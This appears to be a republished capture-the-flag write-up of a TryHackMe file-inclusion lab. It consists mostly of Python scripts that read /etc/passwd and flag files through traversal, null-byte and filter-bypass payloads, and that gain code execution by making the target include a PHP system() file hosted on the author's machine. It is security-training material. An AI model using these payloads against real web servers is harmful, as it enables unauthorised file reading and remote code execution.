TryHackMe — File Inclusion (Using python)
2023-9-18 12:40:26 Author: infosecwriteups.com(查看原文) 阅读量:8 收藏

Gowthamaraj Rajendran (@fuffsec)

InfoSec Write-ups

Link: https://tryhackme.com/room/fileinc

This room introduces file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal.

I have solved all the challenges using python. So, feel free to run the code and check if it is successful for you as well.

Task 1 Introduction

Task 2 Deploy the VM

Task 3 Path Traversal

Task 4 Local File Inclusion — LFI

Lab #1

  • Use the code below to get the flag
import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)

def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content:
print("*** Found LFI***")
payload = '/etc/passwd'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))

def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab1.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")

if __name__ == "__main__":
main()

Lab #2

import requests
import re
pattern = re.compile(rb"include\((.*?)/&quot;",re.DOTALL)

def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content:
print("*** Found Folder***")
payload = '"'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[0].decode("utf-8"))

def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab2.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")

if __name__ == "__main__":
main()

Task 5 Local File Inclusion — LFI #2

Lab #3

import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)

def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content:
print("*** Found LFI***")
payload = '../../../../etc/passwd%00'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))

def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab3.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")

if __name__ == "__main__":
main()

Lab #4

import requests

def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"file_get_contents" in response.content:
print("*** Found Function***")
print("file_get_contents")

def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab4.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")

if __name__ == "__main__":
main()

Lab #5

import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)

def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content:
print("*** Found LFI***")
payload = '....//....//....//....//etc/passwd'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))

def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab5.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")

if __name__ == "__main__":
main()

Lab #6

import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)

def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Access Denied" in response.content:
print("*** Found LFI***")
payload = 'THM-profile/../../../../etc/os-release'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))

def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab6.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")

if __name__ == "__main__":
main()

Task 6 Remote File Inclusion — RFI

Task 7 Remediation

Task 8 Challenge

flag1

import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)

def main():
url = 'http://10.10.72.183/challenges/chall1.php'
data = {"file":"/etc/flag1"}
response = requests.post(url, data)
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))

if __name__ == '__main__':
main()

flag2

import requests
import re
pattern = re.compile(rb"<code>.*</div>(.*?)</code>", re.DOTALL)

def main():
url = 'http://10.10.72.183/challenges/chall2.php'
cookie = {"THM":"../../../../etc/flag2%00"}
response = requests.get(url, cookies=cookie)
data = (response.content)
matches = pattern.findall(data)
print(matches[0].decode("utf-8"))

if __name__ == '__main__':
main()

flag3

import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)

def main():
url = 'http://10.10.72.183/challenges/chall3.php'
data = {"file":"../../../../etc/flag3\x00"}
response = requests.post(url, data)
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))

if __name__ == '__main__':
main()

RCE

rce.txt

<?PHP
echo system('hostname')
?>

rce.py

import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)

def main():
url = 'http://10.10.72.183/playground.php?file=http://10.13.22.219:8000/rce.txt'
response = requests.get(url)
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))

if __name__ == '__main__':
main()

Hay Yay!!!

Please give me a clap if you found it to be helpful and follow me to get more Security knowledge.


文章来源: https://infosecwriteups.com/tryhackme-file-inclusion-using-python-71481983b368?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh